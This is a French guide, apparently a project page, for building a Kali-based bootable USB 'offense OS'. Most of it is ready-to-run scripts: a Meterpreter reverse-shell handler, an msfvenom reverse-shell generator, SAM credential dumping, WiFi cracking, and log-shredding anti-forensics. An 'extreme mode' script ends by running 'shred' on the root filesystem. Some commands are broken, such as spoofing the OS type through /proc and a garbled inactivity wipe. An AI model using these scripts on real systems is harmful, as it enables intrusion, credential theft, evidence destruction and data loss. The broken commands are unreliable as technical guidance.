Platon-Y Offense OS

Un système d’exploitation léger et robuste pour opérations offensives avancées – Persistance, Sécurité, Furtivité, et Outils Spécialisés.

Développé par Platon-Y pour PCTamalou

Attention

Ce système est conçu pour des utilisateurs avancés dans un environnement contrôlé et légal. Une utilisation incorrecte peut entraîner des problèmes techniques ou juridiques. Veuillez lire chaque section attentivement avant de procéder.

Note éthique : Ce projet est destiné à l’apprentissage et aux tests de sécurité dans un cadre légal. Utilisez ses capacités avec sagesse et en respectant les lois en vigueur.

1. Introduction

Bonjour, je suis Platon-Y, et voici "Platon-Y Offense OS". Basé sur Kali Linux, cet OS est optimisé pour des opérations offensives avancées. Il est léger, bootable depuis une clé USB avec persistance, sécurisé à un haut niveau, axé sur la furtivité, et équipé d’un ensemble d’outils spécialisés. Que vous soyez novice ou expert, ce guide vous accompagne étape par étape pour configurer et utiliser cet OS efficacement. Vous pouvez personnaliser les scripts en remplaçant "Platon-Y" par votre propre identifiant si vous souhaitez adapter cette version à votre style.

Ce projet est le fruit de notre collaboration, intégrant des fonctionnalités comme une persistance sécurisée, une furtivité réseau renforcée, et des capacités offensives puissantes. Voici le résultat de notre travail commun à PCTamalou.

2. Matériel requis

Pour utiliser "Platon-Y Offense OS", vous aurez besoin du matériel suivant :

3. Configuration de la base Kali Linux

Nous commençons avec Kali Linux, choisi pour sa fiabilité et ses outils intégrés :

  1. Téléchargez la dernière version live de Kali Linux depuis le site officiel : kali.org.
  2. Insérez votre clé USB dans votre ordinateur.
  3. Utilisez Rufus sur Windows, ou exécutez cette commande sur Linux/Mac pour flasher l’ISO sur la clé : sudo dd if=kali-latest.iso of=/dev/sdX bs=4M status=progress (remplacez "/dev/sdX" par l’identifiant de votre clé USB, vérifiable avec lsblk).
  4. Redémarrez votre ordinateur, accédez au menu de démarrage (souvent avec F12 ou une touche similaire), et sélectionnez la clé USB.
  5. Une fois en mode live, ouvrez un terminal et installez les composants de base : sudo apt update && sudo apt install kali-linux-core -y.

Cette étape pose les fondations solides que nous allons ensuite personnaliser avec des fonctionnalités avancées.

4. Interface Utilisateur : Simple et Efficace

L’interface est conçue pour être intuitive et performante :

Instructions d’installation

# Installation de XFCE et Alacritty pour une interface légère et moderne
sudo apt install xfce4 xfce4-terminal alacritty tmux -y
# Configuration du thème sombre dans Alacritty avec messages en français
echo "colors:
  primary:
    background: '#1a1a1a'
    foreground: '#39ff14'
  cursor:
    text: '#ff0000'
    cursor: '#00ff00'
window:
  title: 'Platon-Y Offense OS - Terminal'" > ~/.config/alacritty/alacritty.yml
# Configuration de Tmux pour le tableau de bord
echo 'bind-key R source-file ~/.tmux.conf \; display "Configuration rechargée !"' > ~/.tmux.conf
tmux new -s platon-y -d
            

Tableau de Bord Web

# Installation du dashboard web
sudo apt install nginx php-fpm -y
sudo cp -r /opt/platon-y/webui /var/www/html/platon-y
sudo chown -R www-data:www-data /var/www/html/platon-y
# Configuration sécurisée
echo "location /platon-y {
    auth_basic 'Accès Restreint';
    auth_basic_user_file /etc/nginx/.htpasswd;
}" > /etc/nginx/sites-available/platon-y
sudo ln -s /etc/nginx/sites-available/platon-y /etc/nginx/sites-enabled/
sudo systemctl restart nginx
            

Accédez au tableau de bord via http://localhost/platon-y après avoir créé un mot de passe avec htpasswd -c /etc/nginx/.htpasswd utilisateur.

5. Automatisation et Assistance IA Locale

Nous avons ajouté des scripts simples pour faciliter l’utilisation et une IA locale basée sur LLaMA pour une assistance hors ligne :

Scripts d’automatisation

# Script : one_click_recon.sh
# Objectif : Effectuer une reconnaissance réseau simple
echo '#!/bin/bash
echo "Démarrage de la reconnaissance réseau sur $1..."
proxychains4 -q nmap -sS -T4 "$1" > /tmp/recon.txt
echo "Reconnaissance terminée. Résultats enregistrés dans /tmp/recon.txt"
' > /opt/platon-y/one_click_recon.sh
chmod +x /opt/platon-y/one_click_recon.sh

# Script : destroy_target_now.sh
# Objectif : Lancer une session d’exploitation de base
echo '#!/bin/bash
echo "Lancement d’une exploitation sur la cible..."
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"
' > /opt/platon-y/destroy_target_now.sh
chmod +x /opt/platon-y/destroy_target_now.sh

# Script : stealth_mode.sh
# Objectif : Activer les configurations de furtivité
echo '#!/bin/bash
echo "Activation du mode furtif..."
macchanger -r wlan0
/opt/platon-y/clean.sh
echo "Mode furtif activé."
' > /opt/platon-y/stealth_mode.sh
chmod +x /opt/platon-y/stealth_mode.sh

# Script : quick_scan_wifi.sh
# Objectif : Scanner les réseaux WiFi à proximité
echo '#!/bin/bash
echo "Scan des réseaux WiFi..."
airmon-ng start wlan0
airodump-ng wlan0mon -w /tmp/wifi_scan
echo "Scan terminé. Résultats dans /tmp/wifi_scan"
' > /opt/platon-y/quick_scan_wifi.sh
chmod +x /opt/platon-y/quick_scan_wifi.sh
            

IA Locale avec LLaMA

Nous utilisons **llama.cpp**, une implémentation open-source de LLaMA, configurée pour répondre en français :

# Installation des dépendances
sudo apt install git build-essential python3 python3-pip -y
# Cloner llama.cpp
git clone https://github.com/ggerganov/llama.cpp /opt/platon-y/llama.cpp
cd /opt/platon-y/llama.cpp
make
# Télécharger un modèle LLaMA léger (exemple : ggml-model-7B)
wget https://huggingface.co/TheBloke/LLaMA-7B-GGML/resolve/main/ggml-model-7b.bin -O /opt/platon-y/llama.cpp/models/llama-7b.bin
# Script d’assistance IA
echo '#!/bin/bash
echo "Posez votre question :"
read question
/opt/platon-y/llama.cpp/main -m /opt/platon-y/llama.cpp/models/llama-7b.bin -p "Explique en français : $question" -n 100
# Pour passer en anglais, remplacez par : -p "Explain in English: $question"
' > /opt/platon-y/platon-y-ai.sh
chmod +x /opt/platon-y/platon-y-ai.sh
            

Exécutez /opt/platon-y/platon-y-ai.sh et posez une question comme "Que fait nmap ?" pour une réponse en français.

6. Back-End Offensif

Le back-end inclut un ensemble robuste d’outils et de scripts personnalisés :

Outils de base

sudo apt install nmap metasploit-framework hydra sqlmap aircrack-ng hashcat crackmapexec powershell-empire -y
git clone https://github.com/BishopFox/sliver /opt/platon-y/arsenal/sliver
cd /opt/platon-y/arsenal/sliver && make
            

Scripts personnalisés

# Script : poly_shell.sh
# Objectif : Générer un shellcode polymorphique
echo '#!/bin/bash
echo "Génération d’un shellcode pour IP $1 et port $2..."
msfvenom -p linux/x64/shell_reverse_tcp LHOST="$1" LPORT="$2" -f c -o /tmp/shellcode.c
gcc -shared -fPIC /tmp/shellcode.c -o /opt/platon-y/arsenal/shellcode.so
echo "Shellcode généré dans /opt/platon-y/arsenal/shellcode.so"
' > /opt/platon-y/arsenal/poly_shell.sh
chmod +x /opt/platon-y/arsenal/poly_shell.sh

# Script : cred_extract.sh
# Objectif : Extraire des identifiants d’une cible
echo '#!/bin/bash
echo "Extraction des identifiants depuis $1..."
crackmapexec smb "$1" -u "guest" -p "" --sam
echo "Extraction terminée."
' > /opt/platon-y/arsenal/cred_extract.sh
chmod +x /opt/platon-y/arsenal/cred_extract.sh

# Script : wifi_crack.sh
# Objectif : Tenter de cracker un réseau WiFi
echo '#!/bin/bash
echo "Tentative de crack sur $1 avec $2..."
aircrack-ng -w "$2" -b "$1" /tmp/wifi_scan-01.cap
echo "Crack terminé."
' > /opt/platon-y/arsenal/wifi_crack.sh
chmod +x /opt/platon-y/arsenal/wifi_crack.sh
            

7. Mode Furtif

Pour une furtivité maximale :

Démarrage en mémoire vive

echo 'GRUB_CMDLINE_LINUX_DEFAULT="quiet splash toram"' >> /etc/default/grub
sudo update-grub
            

Cela charge l’OS entièrement en RAM, ne laissant aucune trace sur le disque.

Nettoyage automatique

echo '#!/bin/bash
echo "Nettoyage du système en cours..."
history -c
arp -d *
shred -u /var/log/*
echo "Système nettoyé."
' > /opt/platon-y/clean.sh
chmod +x /opt/platon-y/clean.sh
            

Usurpation d’empreinte système

echo '#!/bin/bash
echo "Usurpation de l’empreinte système..."
echo "Windows 10" > /proc/sys/kernel/ostype
' > /opt/platon-y/spoof.sh
chmod +x /opt/platon-y/spoof.sh
            

8. Sécurité Avancée

Renforcement de la sécurité interne :

Chiffrement complet

sudo cryptsetup luksFormat /dev/sdX3 -c aes-xts-plain64 -s 512 -h sha512
sudo cryptsetup luksOpen /dev/sdX3 cryptdata
sudo mkfs.ext4 /dev/mapper/cryptdata
            

Noyau personnalisé

sudo apt install build-essential libncurses-dev -y
git clone https://github.com/anthraxx/linux-hardened
cd linux-hardened
make menuconfig  # Désactiver systemd, activer SELinux
make -j$(nproc)
sudo make install
sudo update-grub
            

Configuration SELinux

sudo apt install selinux-basics selinux-policy-default -y
sudo selinux-activate
            

9. Module Forensic

Pour analyser et collecter des preuves numériques :

#!/bin/bash
# Script : forensic.sh
# Objectif : Outil d’analyse forensic
echo "Collecte des preuves numériques..."
mkdir -p /evidence/$(date +%Y-%m-%d)
# Capture mémoire
echo "[+] Capture de la mémoire"
dd if=/dev/mem of=/evidence/memdump.dd bs=1M
# Analyse des processus
echo "[+] Analyse des processus"
ps aux > /evidence/processes.txt
lsof -i > /evidence/network_connections.txt
# Analyse du système de fichiers
echo "[+] Analyse des fichiers système"
find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; > /evidence/suid_sgid_files.txt
            

Exécutez /path/to/forensic.sh pour collecter des données forensic dans /evidence/.

10. Contre-Mesures

Vérification des dépendances critiques

#!/bin/bash
# Script : check_deps.sh
# Objectif : Vérifier et installer les dépendances critiques
check_dependencies() {
    REQUIRED=("python3" "gcc" "make" "libpcap-dev" "git")
    for pkg in "${REQUIRED[@]}"; do
        if ! dpkg -l | grep -q "$pkg"; then
            echo "[ERREUR] $pkg n’est pas installé. Installation en cours..."
            sudo apt-get install -y "$pkg"
        else
            echo "[OK] $pkg est déjà installé."
        fi
    done
}
check_dependencies
            

Exécutez /path/to/check_deps.sh avant toute installation pour garantir que les outils essentiels sont présents.

11. Audit Temps Réel avec Alertes

Surveillance des activités système :

# Script : audit_setup.sh
# Objectif : Configurer l’audit en temps réel
echo "Configuration de l’audit temps réel..."
sudo apt install auditd -y
auditctl -a always,exit -F arch=b64 -S execve -k platon-y-audit
echo "Audit activé. Consultez les logs dans /var/log/audit/audit.log"
            

Exécutez /path/to/audit_setup.sh pour activer la surveillance. Les événements sont enregistrés dans /var/log/audit/audit.log.

12. Sécurité Physique

Destruction d’urgence (Dead Man Switch)

#!/bin/bash
# Script : emergency_wipe.sh
# Objectif : Effacement cryptographique après inactivité
echo "Vérification d’inactivité..."
if [[ $(last -1 | awk '{print $1}') == "root" ]] && [[ $(uptime -p | grep -oP '\d+') -gt 60 ]]; then
    echo "Inactivité détectée. Destruction des données sensibles..."
    shred -fuzn7 /opt/platon-y/arsenal/*
fi
            

Détection de manipulation matérielle

#!/bin/bash
# Script : hardware_check.sh
# Objectif : Détecter les périphériques USB non autorisés
echo "Vérification des périphériques USB..."
lsusb | grep -v "1a86:7523" && echo "Périphérique non autorisé détecté !" | wall
            

Ajustez "1a86:7523" avec l’ID de vos périphériques autorisés.

13. Optimisations Performances

Paramétrage noyau temps réel

echo "Optimisation du noyau pour les opérations réseau..."
echo "net.core.rmem_max=4194304" >> /etc/sysctl.conf
sysctl -p
            

Désactivation des services inutiles

echo "Désactivation des services inutiles..."
systemctl disable bluetooth.service cups.service
            

Support GPU pour Hashcat

# Installation d’OpenCL et NVIDIA pour Hashcat
sudo apt install ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit hashcat -y
echo "Vérification du support GPU pour Hashcat..."
hashcat -I
            

Exécutez hashcat -I pour confirmer la détection du GPU.

14. Support Matériel Avancé

Drivers Spécialisés

# Installation des drivers pour cartes réseau spécifiques
sudo apt install realtek-rtl88xxau-dkms -y  # Pour Alfa AWUS036ACH
sudo modprobe 88XXau
# Support Raspberry Pi 5
if [[ $(uname -m) == "aarch64" ]]; then
    echo "Optimisation ARM64 détectée..."
    sudo apt install kali-arm64 -y
fi
            

Configuration GPU pour Hashcat

# Vérification de la compatibilité CUDA
nvidia-smi
hashcat -I | grep -E 'CUDA|OpenCL'
            

15. Écosystème Collaboratif

Système de Plugins

#!/bin/bash
# Script : load_plugins.sh
# Objectif : Charger les plugins personnalisés
PLUGINS_DIR="/opt/platon-y/plugins"
for plugin in "$PLUGINS_DIR"/*.sh; do
    if [[ -x "$plugin" ]]; then
        echo "Chargement: $(basename $plugin)"
        source "$plugin"
    fi
done
            

Placez vos scripts personnalisés dans /opt/platon-y/plugins/ et exécutez /path/to/load_plugins.sh.

16. Études de Cas Réelles (Anonymisées)

Cas 1 : Analyse d’un réseau WiFi public

Un utilisateur a utilisé quick_scan_wifi.sh pour identifier un réseau WiFi non sécurisé dans un lieu public. Avec wifi_crack.sh et une liste de mots courants, il a démontré une vulnérabilité en moins de 10 minutes (anonymisé pour des raisons légales).

Cas 2 : Récupération de données forensic

Un test sur un système compromis a permis de capturer une image mémoire avec forensic.sh, révélant des processus suspects liés à une attaque réseau (détails anonymisés).

17. Installation Automatisée

#!/bin/bash
# Script : platon-y-setup.sh
# Vérification root
[ "$(id -u)" -ne 0 ] && echo "Exécuter en root!" && exit 1
# Menu interactif
PS3='Choisissez une option: '
options=("Complet" "Minimal" "Personnalisé" "Quitter")
select opt in "${options[@]}"
do
    case $opt in
        "Complet")
            echo "Installation complète..."
            sudo apt update && sudo apt install -y kali-linux-core nmap metasploit-framework hydra sqlmap aircrack-ng hashcat crackmapexec powershell-empire nginx php-fpm auditd ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit realtek-rtl88xxau-dkms
            /path/to/check_deps.sh
            ;;
        "Minimal")
            echo "Installation minimale..."
            sudo apt update && sudo apt install -y kali-linux-core nmap metasploit-framework
            ;;
        "Personnalisé")
            echo "Installation personnalisée... (à configurer selon vos besoins)"
            ;;
        "Quitter")
            break
            ;;
        *) echo "Option invalide";;
    esac
done
            

Exécutez /path/to/platon-y-setup.sh pour une installation automatisée.

18. Packaging

Pour une distribution efficace :

sudo apt install live-build -y
lb config --binary-images iso-hybrid --archive-areas "main contrib non-free" --image-size 300M
lb build
# Interface web locale
sudo apt install lighttpd -y
echo '

Platon-Y Offense OS

ScannerExploiter' > /var/www/html/index.html

Personnalisez GRUB avec des options comme "Mode Apprentissage", "Opération Furtive", "Assaut Total".

19. Documentation

Un guide illustré style jeu rétro :

echo "Pour lancer un scan réseau : /opt/platon-y/one_click_recon.sh CIBLE" > /opt/platon-y/docs/manuel.txt
echo "Niveau 1 : Craquer une box WiFi -> aircrack-ng -w rockyou.txt" >> /opt/platon-y/docs/manuel.txt
            

Fiche de référence rapide

echo "Commandes critiques :
- Scanner réseau : /opt/platon-y/one_click_recon.sh IP
- Exploiter : /opt/platon-y/destroy_target_now.sh
- Mode furtif : /opt/platon-y/stealth_mode.sh" > /opt/platon-y/docs/cheatsheet.txt
            

Arbre de Décision Tactique

Scénario 1 : Reconnaissance → nmap -sS → Si ports ouverts → msfconsole

Scénario 2 : WiFi audit → airodump-ng → Si WEP → aircrack-ng

Scénario 3 : Incident response → forensic.sh → memory_dump → volatility

Schéma Architecture

[Interface] → [Sécurité] → [Outils] → [Réseau]
    ↑               ↓           ↓
[IA Locale] ← [Journalisation] → [Threat Intel]
            

20. Mode Extrême

echo '#!/bin/bash
echo "Mode extrême activé sur $1..."
proxychains4 -q nmap -sS -A "$1"
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"
shred -fuzn7 /
' > /opt/platon-y/omega.sh
chmod +x /opt/platon-y/omega.sh
            

Utilisation : /opt/platon-y/omega.sh 192.168.1.1.

21. Scripts Additionnels

Reconnaissance réseau

#!/bin/bash
# Script : one_click_recon.sh
# Utilisation : ./one_click_recon.sh ADRESSE_IP
echo "Démarrage de la reconnaissance réseau sur $1..."
proxychains4 -q nmap -sS -T4 "$1" > /tmp/recon.txt
echo "Reconnaissance terminée. Résultats dans /tmp/recon.txt"
            

Exploitation ciblée

#!/bin/bash
# Script : destroy_target_now.sh
# Utilisation : ./destroy_target_now.sh
echo "Lancement d’une exploitation..."
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"
            

Activation furtivité

#!/bin/bash
# Script : stealth_mode.sh
# Utilisation : ./stealth_mode.sh
echo "Activation du mode furtif..."
macchanger -r wlan0
/opt/platon-y/clean.sh
echo "Mode furtif activé."
            

Scan WiFi

#!/bin/bash
# Script : quick_scan_wifi.sh
# Utilisation : ./quick_scan_wifi.sh
echo "Scan des réseaux WiFi..."
airmon-ng start wlan0
airodump-ng wlan0mon -w /tmp/wifi_scan
echo "Scan terminé. Résultats dans /tmp/wifi_scan"
            

Crack WiFi

#!/bin/bash
# Script : wifi_crack.sh
# Utilisation : ./wifi_crack.sh BSSID LISTE_MOTS
echo "Tentative de crack sur $1 avec $2..."
aircrack-ng -w "$2" -b "$1" /tmp/wifi_scan-01.cap
echo "Crack terminé."
            

22. Wallpapers

Téléchargez ces fonds d’écran pour personnaliser votre OS :

Placez-les dans /usr/share/backgrounds.

23. Tests

Vérifiez que tout fonctionne correctement :

24. Crédits

Développé par Platon-Y pour PCTamalou. Ce projet est le résultat de notre collaboration visant à créer un outil puissant et éducatif pour les passionnés de sécurité. Merci de l’utiliser de manière responsable dans un cadre légal.

Pour un script offensive en Python complet, voir Platon-Y CyberStrike.